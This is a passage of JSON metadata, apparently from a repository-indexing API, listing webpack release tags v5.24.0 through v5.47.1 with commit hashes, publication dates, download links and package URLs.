dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.